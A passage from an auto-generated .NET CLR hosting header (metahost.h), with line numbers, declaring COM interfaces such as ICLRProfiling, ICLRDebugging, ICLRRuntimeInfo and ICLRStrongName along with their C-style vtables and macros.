QueryInterface(This,riid,ppvObject) ) 477 | 478 | #define ICLRMetaHostPolicy_AddRef(This) \ 479 | ( (This)->lpVtbl -> AddRef(This) ) 480 | 481 | #define ICLRMetaHostPolicy_Release(This) \ 482 | ( (This)->lpVtbl -> Release(This) ) 483 | 484 | 485 | #define ICLRMetaHostPolicy_GetRequestedRuntime(This,dwPolicyFlags,pwzBinary,pCfgStream,pwzVersion,pcchVersion,pwzImageVersion,pcchImageVersion,pdwConfigFlags,riid,ppRuntime) \ 486 | ( (This)->lpVtbl -> GetRequestedRuntime(This,dwPolicyFlags,pwzBinary,pCfgStream,pwzVersion,pcchVersion,pwzImageVersion,pcchImageVersion,pdwConfigFlags,riid,ppRuntime) ) 487 | 488 | #endif /* COBJMACROS */ 489 | 490 | 491 | #endif /* C style interface */ 492 | 493 | 494 | 495 | 496 | #endif /* __ICLRMetaHostPolicy_INTERFACE_DEFINED__ */ 497 | 498 | 499 | #ifndef __ICLRProfiling_INTERFACE_DEFINED__ 500 | #define __ICLRProfiling_INTERFACE_DEFINED__ 501 | 502 | /* interface ICLRProfiling */ 503 | /* [object][local][helpstring][version][uuid] */ 504 | 505 | 506 | EXTERN_C const IID IID_ICLRProfiling; 507 | 508 | #if defined(__cplusplus) && !defined(CINTERFACE) 509 | 510 | MIDL_INTERFACE("B349ABE3-B56F-4689-BFCD-76BF39D888EA") 511 | ICLRProfiling : public IUnknown 512 | { 513 | public: 514 | virtual HRESULT STDMETHODCALLTYPE AttachProfiler( 515 | /* [in] */ DWORD dwProfileeProcessID, 516 | /* [in] */ DWORD dwMillisecondsMax, 517 | /* [in] */ const CLSID *pClsidProfiler, 518 | /* [in] */ LPCWSTR wszProfilerPath, 519 | /* [size_is][in] */ void *pvClientData, 520 | /* [in] */ UINT cbClientData) = 0; 521 | 522 | }; 523 | 524 | 525 | #else /* C style interface */ 526 | 527 | typedef struct ICLRProfilingVtbl 528 | { 529 | BEGIN_INTERFACE 530 | 531 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 532 | ICLRProfiling * This, 533 | /* [in] */ REFIID riid, 534 | /* [annotation][iid_is][out] */ 535 | _COM_Outptr_ void **ppvObject); 536 | 537 | ULONG ( STDMETHODCALLTYPE *AddRef )( 538 | ICLRProfiling * This); 539 | 540 | ULONG ( STDMETHODCALLTYPE *Release )( 541 | ICLRProfiling * This); 542 | 543 | HRESULT ( STDMETHODCALLTYPE *AttachProfiler )( 544 | ICLRProfiling * This, 545 | /* [in] */ DWORD dwProfileeProcessID, 546 | /* [in] */ DWORD dwMillisecondsMax, 547 | /* [in] */ const CLSID *pClsidProfiler, 548 | /* [in] */ LPCWSTR wszProfilerPath, 549 | /* [size_is][in] */ void *pvClientData, 550 | /* [in] */ UINT cbClientData); 551 | 552 | END_INTERFACE 553 | } ICLRProfilingVtbl; 554 | 555 | interface ICLRProfiling 556 | { 557 | CONST_VTBL struct ICLRProfilingVtbl *lpVtbl; 558 | }; 559 | 560 | 561 | 562 | #ifdef COBJMACROS 563 | 564 | 565 | #define ICLRProfiling_QueryInterface(This,riid,ppvObject) \ 566 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 567 | 568 | #define ICLRProfiling_AddRef(This) \ 569 | ( (This)->lpVtbl -> AddRef(This) ) 570 | 571 | #define ICLRProfiling_Release(This) \ 572 | ( (This)->lpVtbl -> Release(This) ) 573 | 574 | 575 | #define ICLRProfiling_AttachProfiler(This,dwProfileeProcessID,dwMillisecondsMax,pClsidProfiler,wszProfilerPath,pvClientData,cbClientData) \ 576 | ( (This)->lpVtbl -> AttachProfiler(This,dwProfileeProcessID,dwMillisecondsMax,pClsidProfiler,wszProfilerPath,pvClientData,cbClientData) ) 577 | 578 | #endif /* COBJMACROS */ 579 | 580 | 581 | #endif /* C style interface */ 582 | 583 | 584 | 585 | 586 | #endif /* __ICLRProfiling_INTERFACE_DEFINED__ */ 587 | 588 | 589 | /* interface __MIDL_itf_metahost_0000_0003 */ 590 | /* [local] */ 591 | 592 | typedef struct _CLR_DEBUGGING_VERSION 593 | { 594 | WORD wStructVersion; 595 | WORD wMajor; 596 | WORD wMinor; 597 | WORD wBuild; 598 | WORD wRevision; 599 | } CLR_DEBUGGING_VERSION; 600 | 601 | typedef /* [public][public] */ 602 | enum __MIDL___MIDL_itf_metahost_0000_0003_0001 603 | { 604 | CLR_DEBUGGING_MANAGED_EVENT_PENDING = 1, 605 | CLR_DEBUGGING_MANAGED_EVENT_DEBUGGER_LAUNCH = 2 606 | } CLR_DEBUGGING_PROCESS_FLAGS; 607 | 608 | 609 | 610 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0003_v0_0_c_ifspec; 611 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0003_v0_0_s_ifspec; 612 | 613 | #ifndef __ICLRDebuggingLibraryProvider_INTERFACE_DEFINED__ 614 | #define __ICLRDebuggingLibraryProvider_INTERFACE_DEFINED__ 615 | 616 | /* interface ICLRDebuggingLibraryProvider */ 617 | /* [object][local][helpstring][version][uuid] */ 618 | 619 | 620 | EXTERN_C const IID IID_ICLRDebuggingLibraryProvider; 621 | 622 | #if defined(__cplusplus) && !defined(CINTERFACE) 623 | 624 | MIDL_INTERFACE("3151C08D-4D09-4f9b-8838-2880BF18FE51") 625 | ICLRDebuggingLibraryProvider : public IUnknown 626 | { 627 | public: 628 | virtual HRESULT STDMETHODCALLTYPE ProvideLibrary( 629 | /* [in] */ const WCHAR *pwszFileName, 630 | /* [in] */ DWORD dwTimestamp, 631 | /* [in] */ DWORD dwSizeOfImage, 632 | /* [out] */ HMODULE *phModule) = 0; 633 | 634 | }; 635 | 636 | 637 | #else /* C style interface */ 638 | 639 | typedef struct ICLRDebuggingLibraryProviderVtbl 640 | { 641 | BEGIN_INTERFACE 642 | 643 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 644 | ICLRDebuggingLibraryProvider * This, 645 | /* [in] */ REFIID riid, 646 | /* [annotation][iid_is][out] */ 647 | _COM_Outptr_ void **ppvObject); 648 | 649 | ULONG ( STDMETHODCALLTYPE *AddRef )( 650 | ICLRDebuggingLibraryProvider * This); 651 | 652 | ULONG ( STDMETHODCALLTYPE *Release )( 653 | ICLRDebuggingLibraryProvider * This); 654 | 655 | HRESULT ( STDMETHODCALLTYPE *ProvideLibrary )( 656 | ICLRDebuggingLibraryProvider * This, 657 | /* [in] */ const WCHAR *pwszFileName, 658 | /* [in] */ DWORD dwTimestamp, 659 | /* [in] */ DWORD dwSizeOfImage, 660 | /* [out] */ HMODULE *phModule); 661 | 662 | END_INTERFACE 663 | } ICLRDebuggingLibraryProviderVtbl; 664 | 665 | interface ICLRDebuggingLibraryProvider 666 | { 667 | CONST_VTBL struct ICLRDebuggingLibraryProviderVtbl *lpVtbl; 668 | }; 669 | 670 | 671 | 672 | #ifdef COBJMACROS 673 | 674 | 675 | #define ICLRDebuggingLibraryProvider_QueryInterface(This,riid,ppvObject) \ 676 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 677 | 678 | #define ICLRDebuggingLibraryProvider_AddRef(This) \ 679 | ( (This)->lpVtbl -> AddRef(This) ) 680 | 681 | #define ICLRDebuggingLibraryProvider_Release(This) \ 682 | ( (This)->lpVtbl -> Release(This) ) 683 | 684 | 685 | #define ICLRDebuggingLibraryProvider_ProvideLibrary(This,pwszFileName,dwTimestamp,dwSizeOfImage,phModule) \ 686 | ( (This)->lpVtbl -> ProvideLibrary(This,pwszFileName,dwTimestamp,dwSizeOfImage,phModule) ) 687 | 688 | #endif /* COBJMACROS */ 689 | 690 | 691 | #endif /* C style interface */ 692 | 693 | 694 | 695 | 696 | #endif /* __ICLRDebuggingLibraryProvider_INTERFACE_DEFINED__ */ 697 | 698 | 699 | #ifndef __ICLRDebugging_INTERFACE_DEFINED__ 700 | #define __ICLRDebugging_INTERFACE_DEFINED__ 701 | 702 | /* interface ICLRDebugging */ 703 | /* [object][local][helpstring][version][uuid] */ 704 | 705 | 706 | EXTERN_C const IID IID_ICLRDebugging; 707 | 708 | #if defined(__cplusplus) && !defined(CINTERFACE) 709 | 710 | MIDL_INTERFACE("D28F3C5A-9634-4206-A509-477552EEFB10") 711 | ICLRDebugging : public IUnknown 712 | { 713 | public: 714 | virtual HRESULT STDMETHODCALLTYPE OpenVirtualProcess( 715 | /* [in] */ ULONG64 moduleBaseAddress, 716 | /* [in] */ IUnknown *pDataTarget, 717 | /* [in] */ ICLRDebuggingLibraryProvider *pLibraryProvider, 718 | /* [in] */ CLR_DEBUGGING_VERSION *pMaxDebuggerSupportedVersion, 719 | /* [in] */ REFIID riidProcess, 720 | /* [iid_is][out] */ IUnknown **ppProcess, 721 | /* [out][in] */ CLR_DEBUGGING_VERSION *pVersion, 722 | /* [out] */ CLR_DEBUGGING_PROCESS_FLAGS *pdwFlags) = 0; 723 | 724 | virtual HRESULT STDMETHODCALLTYPE CanUnloadNow( 725 | HMODULE hModule) = 0; 726 | 727 | }; 728 | 729 | 730 | #else /* C style interface */ 731 | 732 | typedef struct ICLRDebuggingVtbl 733 | { 734 | BEGIN_INTERFACE 735 | 736 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 737 | ICLRDebugging * This, 738 | /* [in] */ REFIID riid, 739 | /* [annotation][iid_is][out] */ 740 | _COM_Outptr_ void **ppvObject); 741 | 742 | ULONG ( STDMETHODCALLTYPE *AddRef )( 743 | ICLRDebugging * This); 744 | 745 | ULONG ( STDMETHODCALLTYPE *Release )( 746 | ICLRDebugging * This); 747 | 748 | HRESULT ( STDMETHODCALLTYPE *OpenVirtualProcess )( 749 | ICLRDebugging * This, 750 | /* [in] */ ULONG64 moduleBaseAddress, 751 | /* [in] */ IUnknown *pDataTarget, 752 | /* [in] */ ICLRDebuggingLibraryProvider *pLibraryProvider, 753 | /* [in] */ CLR_DEBUGGING_VERSION *pMaxDebuggerSupportedVersion, 754 | /* [in] */ REFIID riidProcess, 755 | /* [iid_is][out] */ IUnknown **ppProcess, 756 | /* [out][in] */ CLR_DEBUGGING_VERSION *pVersion, 757 | /* [out] */ CLR_DEBUGGING_PROCESS_FLAGS *pdwFlags); 758 | 759 | HRESULT ( STDMETHODCALLTYPE *CanUnloadNow )( 760 | ICLRDebugging * This, 761 | HMODULE hModule); 762 | 763 | END_INTERFACE 764 | } ICLRDebuggingVtbl; 765 | 766 | interface ICLRDebugging 767 | { 768 | CONST_VTBL struct ICLRDebuggingVtbl *lpVtbl; 769 | }; 770 | 771 | 772 | 773 | #ifdef COBJMACROS 774 | 775 | 776 | #define ICLRDebugging_QueryInterface(This,riid,ppvObject) \ 777 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 778 | 779 | #define ICLRDebugging_AddRef(This) \ 780 | ( (This)->lpVtbl -> AddRef(This) ) 781 | 782 | #define ICLRDebugging_Release(This) \ 783 | ( (This)->lpVtbl -> Release(This) ) 784 | 785 | 786 | #define ICLRDebugging_OpenVirtualProcess(This,moduleBaseAddress,pDataTarget,pLibraryProvider,pMaxDebuggerSupportedVersion,riidProcess,ppProcess,pVersion,pdwFlags) \ 787 | ( (This)->lpVtbl -> OpenVirtualProcess(This,moduleBaseAddress,pDataTarget,pLibraryProvider,pMaxDebuggerSupportedVersion,riidProcess,ppProcess,pVersion,pdwFlags) ) 788 | 789 | #define ICLRDebugging_CanUnloadNow(This,hModule) \ 790 | ( (This)->lpVtbl -> CanUnloadNow(This,hModule) ) 791 | 792 | #endif /* COBJMACROS */ 793 | 794 | 795 | #endif /* C style interface */ 796 | 797 | 798 | 799 | 800 | #endif /* __ICLRDebugging_INTERFACE_DEFINED__ */ 801 | 802 | 803 | #ifndef __ICLRRuntimeInfo_INTERFACE_DEFINED__ 804 | #define __ICLRRuntimeInfo_INTERFACE_DEFINED__ 805 | 806 | /* interface ICLRRuntimeInfo */ 807 | /* [object][local][helpstring][version][uuid] */ 808 | 809 | 810 | EXTERN_C const IID IID_ICLRRuntimeInfo; 811 | 812 | #if defined(__cplusplus) && !defined(CINTERFACE) 813 | 814 | MIDL_INTERFACE("BD39D1D2-BA2F-486a-89B0-B4B0CB466891") 815 | ICLRRuntimeInfo : public IUnknown 816 | { 817 | public: 818 | virtual HRESULT STDMETHODCALLTYPE GetVersionString( 819 | /* [annotation][size_is][out] */ 820 | _Out_writes_all_opt_(*pcchBuffer) LPWSTR pwzBuffer, 821 | /* [out][in] */ DWORD *pcchBuffer) = 0; 822 | 823 | virtual HRESULT STDMETHODCALLTYPE GetRuntimeDirectory( 824 | /* [annotation][size_is][out] */ 825 | _Out_writes_all_(*pcchBuffer) LPWSTR pwzBuffer, 826 | /* [out][in] */ DWORD *pcchBuffer) = 0; 827 | 828 | virtual HRESULT STDMETHODCALLTYPE IsLoaded( 829 | /* [in] */ HANDLE hndProcess, 830 | /* [retval][out] */ BOOL *pbLoaded) = 0; 831 | 832 | virtual HRESULT STDMETHODCALLTYPE LoadErrorString( 833 | /* [in] */ UINT iResourceID, 834 | /* [annotation][size_is][out] */ 835 | _Out_writes_all_(*pcchBuffer) LPWSTR pwzBuffer, 836 | /* [out][in] */ DWORD *pcchBuffer, 837 | /* [lcid][in] */ LONG iLocaleID) = 0; 838 | 839 | virtual HRESULT STDMETHODCALLTYPE LoadLibrary( 840 | /* [in] */ LPCWSTR pwzDllName, 841 | /* [retval][out] */ HMODULE *phndModule) = 0; 842 | 843 | virtual HRESULT STDMETHODCALLTYPE GetProcAddress( 844 | /* [in] */ LPCSTR pszProcName, 845 | /* [retval][out] */ LPVOID *ppProc) = 0; 846 | 847 | virtual HRESULT STDMETHODCALLTYPE GetInterface( 848 | /* [in] */ REFCLSID rclsid, 849 | /* [in] */ REFIID riid, 850 | /* [retval][iid_is][out] */ LPVOID *ppUnk) = 0; 851 | 852 | virtual HRESULT STDMETHODCALLTYPE IsLoadable( 853 | /* [retval][out] */ BOOL *pbLoadable) = 0; 854 | 855 | virtual HRESULT STDMETHODCALLTYPE SetDefaultStartupFlags( 856 | /* [in] */ DWORD dwStartupFlags, 857 | /* [in] */ LPCWSTR pwzHostConfigFile) = 0; 858 | 859 | virtual HRESULT STDMETHODCALLTYPE GetDefaultStartupFlags( 860 | /* [out] */ DWORD *pdwStartupFlags, 861 | /* [annotation][size_is][out] */ 862 | _Out_writes_all_opt_(*pcchHostConfigFile) LPWSTR pwzHostConfigFile, 863 | /* [out][in] */ DWORD *pcchHostConfigFile) = 0; 864 | 865 | virtual HRESULT STDMETHODCALLTYPE BindAsLegacyV2Runtime( void) = 0; 866 | 867 | virtual HRESULT STDMETHODCALLTYPE IsStarted( 868 | /* [out] */ BOOL *pbStarted, 869 | /* [out] */ DWORD *pdwStartupFlags) = 0; 870 | 871 | }; 872 | 873 | 874 | #else /* C style interface */ 875 | 876 | typedef struct ICLRRuntimeInfoVtbl 877 | { 878 | BEGIN_INTERFACE 879 | 880 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 881 | ICLRRuntimeInfo * This, 882 | /* [in] */ REFIID riid, 883 | /* [annotation][iid_is][out] */ 884 | _COM_Outptr_ void **ppvObject); 885 | 886 | ULONG ( STDMETHODCALLTYPE *AddRef )( 887 | ICLRRuntimeInfo * This); 888 | 889 | ULONG ( STDMETHODCALLTYPE *Release )( 890 | ICLRRuntimeInfo * This); 891 | 892 | HRESULT ( STDMETHODCALLTYPE *GetVersionString )( 893 | ICLRRuntimeInfo * This, 894 | /* [annotation][size_is][out] */ 895 | _Out_writes_all_opt_(*pcchBuffer) LPWSTR pwzBuffer, 896 | /* [out][in] */ DWORD *pcchBuffer); 897 | 898 | HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )( 899 | ICLRRuntimeInfo * This, 900 | /* [annotation][size_is][out] */ 901 | _Out_writes_all_(*pcchBuffer) LPWSTR pwzBuffer, 902 | /* [out][in] */ DWORD *pcchBuffer); 903 | 904 | HRESULT ( STDMETHODCALLTYPE *IsLoaded )( 905 | ICLRRuntimeInfo * This, 906 | /* [in] */ HANDLE hndProcess, 907 | /* [retval][out] */ BOOL *pbLoaded); 908 | 909 | HRESULT ( STDMETHODCALLTYPE *LoadErrorString )( 910 | ICLRRuntimeInfo * This, 911 | /* [in] */ UINT iResourceID, 912 | /* [annotation][size_is][out] */ 913 | _Out_writes_all_(*pcchBuffer) LPWSTR pwzBuffer, 914 | /* [out][in] */ DWORD *pcchBuffer, 915 | /* [lcid][in] */ LONG iLocaleID); 916 | 917 | HRESULT ( STDMETHODCALLTYPE *LoadLibrary )( 918 | ICLRRuntimeInfo * This, 919 | /* [in] */ LPCWSTR pwzDllName, 920 | /* [retval][out] */ HMODULE *phndModule); 921 | 922 | HRESULT ( STDMETHODCALLTYPE *GetProcAddress )( 923 | ICLRRuntimeInfo * This, 924 | /* [in] */ LPCSTR pszProcName, 925 | /* [retval][out] */ LPVOID *ppProc); 926 | 927 | HRESULT ( STDMETHODCALLTYPE *GetInterface )( 928 | ICLRRuntimeInfo * This, 929 | /* [in] */ REFCLSID rclsid, 930 | /* [in] */ REFIID riid, 931 | /* [retval][iid_is][out] */ LPVOID *ppUnk); 932 | 933 | HRESULT ( STDMETHODCALLTYPE *IsLoadable )( 934 | ICLRRuntimeInfo * This, 935 | /* [retval][out] */ BOOL *pbLoadable); 936 | 937 | HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )( 938 | ICLRRuntimeInfo * This, 939 | /* [in] */ DWORD dwStartupFlags, 940 | /* [in] */ LPCWSTR pwzHostConfigFile); 941 | 942 | HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )( 943 | ICLRRuntimeInfo * This, 944 | /* [out] */ DWORD *pdwStartupFlags, 945 | /* [annotation][size_is][out] */ 946 | _Out_writes_all_opt_(*pcchHostConfigFile) LPWSTR pwzHostConfigFile, 947 | /* [out][in] */ DWORD *pcchHostConfigFile); 948 | 949 | HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )( 950 | ICLRRuntimeInfo * This); 951 | 952 | HRESULT ( STDMETHODCALLTYPE *IsStarted )( 953 | ICLRRuntimeInfo * This, 954 | /* [out] */ BOOL *pbStarted, 955 | /* [out] */ DWORD *pdwStartupFlags); 956 | 957 | END_INTERFACE 958 | } ICLRRuntimeInfoVtbl; 959 | 960 | interface ICLRRuntimeInfo 961 | { 962 | CONST_VTBL struct ICLRRuntimeInfoVtbl *lpVtbl; 963 | }; 964 | 965 | 966 | 967 | #ifdef COBJMACROS 968 | 969 | 970 | #define ICLRRuntimeInfo_QueryInterface(This,riid,ppvObject) \ 971 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 972 | 973 | #define ICLRRuntimeInfo_AddRef(This) \ 974 | ( (This)->lpVtbl -> AddRef(This) ) 975 | 976 | #define ICLRRuntimeInfo_Release(This) \ 977 | ( (This)->lpVtbl -> Release(This) ) 978 | 979 | 980 | #define ICLRRuntimeInfo_GetVersionString(This,pwzBuffer,pcchBuffer) \ 981 | ( (This)->lpVtbl -> GetVersionString(This,pwzBuffer,pcchBuffer) ) 982 | 983 | #define ICLRRuntimeInfo_GetRuntimeDirectory(This,pwzBuffer,pcchBuffer) \ 984 | ( (This)->lpVtbl -> GetRuntimeDirectory(This,pwzBuffer,pcchBuffer) ) 985 | 986 | #define ICLRRuntimeInfo_IsLoaded(This,hndProcess,pbLoaded) \ 987 | ( (This)->lpVtbl -> IsLoaded(This,hndProcess,pbLoaded) ) 988 | 989 | #define ICLRRuntimeInfo_LoadErrorString(This,iResourceID,pwzBuffer,pcchBuffer,iLocaleID) \ 990 | ( (This)->lpVtbl -> LoadErrorString(This,iResourceID,pwzBuffer,pcchBuffer,iLocaleID) ) 991 | 992 | #define ICLRRuntimeInfo_LoadLibrary(This,pwzDllName,phndModule) \ 993 | ( (This)->lpVtbl -> LoadLibrary(This,pwzDllName,phndModule) ) 994 | 995 | #define ICLRRuntimeInfo_GetProcAddress(This,pszProcName,ppProc) \ 996 | ( (This)->lpVtbl -> GetProcAddress(This,pszProcName,ppProc) ) 997 | 998 | #define ICLRRuntimeInfo_GetInterface(This,rclsid,riid,ppUnk) \ 999 | ( (This)->lpVtbl -> GetInterface(This,rclsid,riid,ppUnk) ) 1000 | 1001 | #define ICLRRuntimeInfo_IsLoadable(This,pbLoadable) \ 1002 | ( (This)->lpVtbl -> IsLoadable(This,pbLoadable) ) 1003 | 1004 | #define ICLRRuntimeInfo_SetDefaultStartupFlags(This,dwStartupFlags,pwzHostConfigFile) \ 1005 | ( (This)->lpVtbl -> SetDefaultStartupFlags(This,dwStartupFlags,pwzHostConfigFile) ) 1006 | 1007 | #define ICLRRuntimeInfo_GetDefaultStartupFlags(This,pdwStartupFlags,pwzHostConfigFile,pcchHostConfigFile) \ 1008 | ( (This)->lpVtbl -> GetDefaultStartupFlags(This,pdwStartupFlags,pwzHostConfigFile,pcchHostConfigFile) ) 1009 | 1010 | #define ICLRRuntimeInfo_BindAsLegacyV2Runtime(This) \ 1011 | ( (This)->lpVtbl -> BindAsLegacyV2Runtime(This) ) 1012 | 1013 | #define ICLRRuntimeInfo_IsStarted(This,pbStarted,pdwStartupFlags) \ 1014 | ( (This)->lpVtbl -> IsStarted(This,pbStarted,pdwStartupFlags) ) 1015 | 1016 | #endif /* COBJMACROS */ 1017 | 1018 | 1019 | #endif /* C style interface */ 1020 | 1021 | 1022 | 1023 | 1024 | #endif /* __ICLRRuntimeInfo_INTERFACE_DEFINED__ */ 1025 | 1026 | 1027 | #ifndef __ICLRStrongName_INTERFACE_DEFINED__ 1028 | #define __ICLRStrongName_INTERFACE_DEFINED__ 1029 | 1030 | /* interface ICLRStrongName */ 1031 | /* [object][local][helpstring][version][uuid] */ 1032 | 1033 | 1034 | EXTERN_C const IID IID_ICLRStrongName; 1035 | 1036 | #if defined(__cplusplus) && !defined(CINTERFACE) 1037 | 1038 | MIDL_INTERFACE("9FD93CCF-3280-4391-B3A9-96E1CDE77C8D") 1039 | ICLRStrongName : public IUnknown 1040 | { 1041 | public: 1042 | virtual HRESULT STDMETHODCALLTYPE GetHashFromAssemblyFile( 1043 | /* [in] */ LPCSTR pszFilePath, 1044 | /* [out][in] */ unsigned int *piHashAlg, 1045 | /* [length_is][size_is][out] */ BYTE *pbHash, 1046 | /* [in] */ DWORD cchHash, 1047 | /* [out] */ DWORD *pchHash) = 0; 1048 | 1049 | virtual HRESULT STDMETHODCALLTYPE GetHashFromAssemblyFileW( 1050 | /* [in] */ LPCWSTR pwzFilePath, 1051 | /* [out][in] */ unsigned int *piHashAlg, 1052 | /* [length_is][size_is][out] */ BYTE *pbHash, 1053 | /* [in] */ DWORD cchHash, 1054 | /* [out] */ DWORD *pchHash) = 0; 1055 | 1056 | virtual HRESULT STDMETHODCALLTYPE GetHashFromBlob( 1057 | /* [in] */ BYTE *pbBlob, 1058 | /* [in] */ DWORD cchBlob, 1059 | /* [out][in] */ unsigned int *piHashAlg, 1060 | /* [length_is][size_is][out] */ BYTE *pbHash, 1061 | /* [in] */ DWORD cchHash, 1062 | /* [out] */ DWORD *pchHash) = 0; 1063 | 1064 | virtual HRESULT STDMETHODCALLTYPE GetHashFromFile( 1065 | /* [in] */ LPCSTR pszFilePath, 1066 | /* [out][in] */ unsigned int *piHashAlg, 1067 | /* [length_is][size_is][out] */ BYTE *pbHash, 1068 | /* [in] */ DWORD cchHash, 1069 | /* [out] */ DWORD *pchHash) = 0; 1070 | 1071 | virtual HRESULT STDMETHODCALLTYPE GetHashFromFileW( 1072 | /* [in] */ LPCWSTR pwzFilePath, 1073 | /* [out][in] */ unsigned int *piHashAlg, 1074 | /* [length_is][size_is][out] */ BYTE *pbHash, 1075 | /* [in] */ DWORD cchHash, 1076 | /* [out] */ DWORD *pchHash) = 0; 1077 | 1078 | virtual HRESULT STDMETHODCALLTYPE GetHashFromHandle( 1079 | /* [in] */ HANDLE hFile, 1080 | /* [out][in] */ unsigned int *piHashAlg, 1081 | /* [length_is][size_is][out] */ BYTE *pbHash, 1082 | /* [in] */ DWORD cchHash, 1083 | /* [out] */ DWORD *pchHash) = 0; 1084 | 1085 | virtual HRESULT STDMETHODCALLTYPE StrongNameCompareAssemblies( 1086 | /* [in] */ LPCWSTR pwzAssembly1, 1087 | /* [in] */ LPCWSTR pwzAssembly2, 1088 | /* [retval][out] */ DWORD *pdwResult) = 0; 1089 | 1090 | virtual HRESULT STDMETHODCALLTYPE StrongNameFreeBuffer( 1091 | /* [in] */ BYTE *pbMemory) = 0; 1092 | 1093 | virtual HRESULT STDMETHODCALLTYPE StrongNameGetBlob( 1094 | /* [in] */ LPCWSTR pwzFilePath, 1095 | /* [length_is][size_is][out][in] */ BYTE *pbBlob, 1096 | /* [out][in] */ DWORD *pcbBlob) = 0; 1097 | 1098 | virtual HRESULT STDMETHODCALLTYPE StrongNameGetBlobFromImage( 1099 | /* [size_is][in] */ BYTE *pbBase, 1100 | /* [in] */ DWORD dwLength, 1101 | /* [length_is][size_is][out] */ BYTE *pbBlob, 1102 | /* [out][in] */ DWORD *pcbBlob) = 0; 1103 | 1104 | virtual HRESULT STDMETHODCALLTYPE StrongNameGetPublicKey( 1105 | /* [in] */ LPCWSTR pwzKeyContainer, 1106 | /* [in] */ BYTE *pbKeyBlob, 1107 | /* [in] */ ULONG cbKeyBlob, 1108 | /* [out] */ BYTE **ppbPublicKeyBlob, 1109 | /* [out] */ ULONG *pcbPublicKeyBlob) = 0; 1110 | 1111 | virtual HRESULT STDMETHODCALLTYPE StrongNameHashSize( 1112 | /* [in] */ ULONG ulHashAlg, 1113 | /* [retval][out] */ DWORD *pcbSize) = 0; 1114 | 1115 | virtual HRESULT STDMETHODCALLTYPE StrongNameKeyDelete( 1116 | /* [in] */ LPCWSTR pwzKeyContainer) = 0; 1117 | 1118 | virtual HRESULT STDMETHODCALLTYPE StrongNameKeyGen( 1119 | /* [in] */ LPCWSTR pwzKeyContainer, 1120 | /* [in] */ DWORD dwFlags, 1121 | /* [out] */ BYTE **ppbKeyBlob, 1122 | /* [out] */ ULONG *pcbKeyBlob) = 0; 1123 | 1124 | virtual HRESULT STDMETHODCALLTYPE StrongNameKeyGenEx( 1125 | /* [in] */ LPCWSTR pwzKeyContainer, 1126 | /* [in] */ DWORD dwFlags, 1127 | /* [in] */ DWORD dwKeySize, 1128 | /* [out] */ BYTE **ppbKeyBlob, 1129 | /* [out] */ ULONG *pcbKeyBlob) = 0; 1130 | 1131 | virtual HRESULT STDMETHODCALLTYPE StrongNameKeyInstall( 1132 | /* [in] */ LPCWSTR pwzKeyContainer, 1133 | /* [in] */ BYTE *pbKeyBlob, 1134 | /* [in] */ ULONG cbKeyBlob) = 0; 1135 | 1136 | virtual HRESULT STDMETHODCALLTYPE StrongNameSignatureGeneration( 1137 | /* [in] */ LPCWSTR pwzFilePath, 1138 | /* [in] */ LPCWSTR pwzKeyContainer, 1139 | /* [in] */ BYTE *pbKeyBlob, 1140 | /* [in] */ ULONG cbKeyBlob, 1141 | /* [out] */ BYTE **ppbSignatureBlob, 1142 | /* [out] */ ULONG *pcbSignatureBlob) = 0; 1143 | 1144 | virtual HRESULT STDMETHODCALLTYPE StrongNameSignatureGenerationEx( 1145 | /* [in] */ LPCWSTR wszFilePath, 1146 | /* [in] */ LPCWSTR wszKeyContainer, 1147 | /* [in] */ BYTE *pbKeyBlob, 1148 | /* [in] */ ULONG cbKeyBlob, 1149 | /* [out] */ BYTE **ppbSignatureBlob, 1150 | /* [out] */ ULONG *pcbSignatureBlob, 1151 | /* [in] */ DWORD dwFlags) = 0; 1152 | 1153 | virtual HRESULT STDMETHODCALLTYPE StrongNameSignatureSize( 1154 | /* [in] */ BYTE *pbPublicKeyBlob, 1155 | /* [in] */ ULONG cbPublicKeyBlob, 1156 | /* [in] */ DWORD *pcbSize) = 0; 1157 | 1158 | virtual HRESULT STDMETHODCALLTYPE StrongNameSignatureVerification( 1159 | /* [in] */ LPCWSTR pwzFilePath, 1160 | /* [in] */ DWORD dwInFlags, 1161 | /* [retval][out] */ DWORD *pdwOutFlags) = 0; 1162 | 1163 | virtual HRESULT STDMETHODCALLTYPE StrongNameSignatureVerificationEx( 1164 | /* [in] */ LPCWSTR pwzFilePath, 1165 | /* [in] */ BOOLEAN fForceVerification, 1166 | /* [retval][out] */ BOOLEAN *pfWasVerified) = 0; 1167 | 1168 | virtual HRESULT STDMETHODCALLTYPE StrongNameSignatureVerificationFromImage( 1169 | /* [in] */ BYTE *pbBase, 1170 | /* [in] */ DWORD dwLength, 1171 | /* [in] */ DWORD dwInFlags, 1172 | /* [retval][out] */ DWORD *pdwOutFlags) = 0; 1173 | 1174 | virtual HRESULT STDMETHODCALLTYPE StrongNameTokenFromAssembly( 1175 | /* [in] */ LPCWSTR pwzFilePath, 1176 | /* [out] */ BYTE **ppbStrongNameToken, 1177 | /* [out] */ ULONG *pcbStrongNameToken) = 0; 1178 | 1179 | virtual HRESULT STDMETHODCALLTYPE StrongNameTokenFromAssemblyEx( 1180 | /* [in] */ LPCWSTR pwzFilePath, 1181 | /* [out] */ BYTE **ppbStrongNameToken, 1182 | /* [out] */ ULONG *pcbStrongNameToken, 1183 | /* [out] */ BYTE **ppbPublicKeyBlob, 1184 | /* [out] */ ULONG *pcbPublicKeyBlob) = 0; 1185 | 1186 | virtual HRESULT STDMETHODCALLTYPE StrongNameTokenFromPublicKey( 1187 | /* [in] */ BYTE *pbPublicKeyBlob, 1188 | /* [in] */ ULONG cbPublicKeyBlob, 1189 | /* [out] */ BYTE **ppbStrongNameToken, 1190 | /* [out] */ ULONG *pcbStrongNameToken) = 0; 1191 | 1192 | }; 1193 | 1194 | 1195 | #else /* C style interface */ 1196 | 1197 | typedef struct 